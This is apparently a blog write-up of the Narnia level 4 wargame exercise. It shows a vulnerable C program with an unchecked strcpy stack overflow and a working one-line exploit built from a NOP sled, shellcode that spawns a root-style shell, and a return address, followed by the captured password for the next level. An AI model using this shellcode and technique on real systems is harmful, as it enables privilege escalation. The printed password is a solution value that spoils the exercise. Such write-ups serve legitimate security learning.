Narnia: Level 4

We all have to start somewhere

Posted on May 10, 2017, 8:47 p.m.

Level 4 doesn't really introduce anything new as far as I can tell.

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>

extern char **environ;

int main(int argc,char **argv){
    int i;
    char buffer[256];

    for(i = 0; environ[i] != NULL; i++)
        memset(environ[i], '\0', strlen(environ[i]));

    if(argc>1)
        strcpy(buffer,argv[1]);

    return 0;
}

The for loop involving memset simply 0's out all the environment variables and unless I'm missing something doesn't really make the level any harder, apart from meaning that you can't introduce your shellcode into the program's memory space using environment variables. In a similar way to Level 2 we can overflow buffer with our payload, which consists of only NOPs except right at the end where we put our shellcode followed by our return address. Using gdb we can find a return address that returns to anywhere near the middle of our NOP sled, again making sure the address does not contain any null bytes.

narnia4@melinda:/narnia$ ./narnia4 $(python -c 'print "\x90"*217 + "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42" + "\x10\xd8\xff\xff"')
$ whoami
narnia5
$ cat /etc/narnia_pass/narnia5
faimahchiy

Comments


Latest Posts


Archive

2017

Categories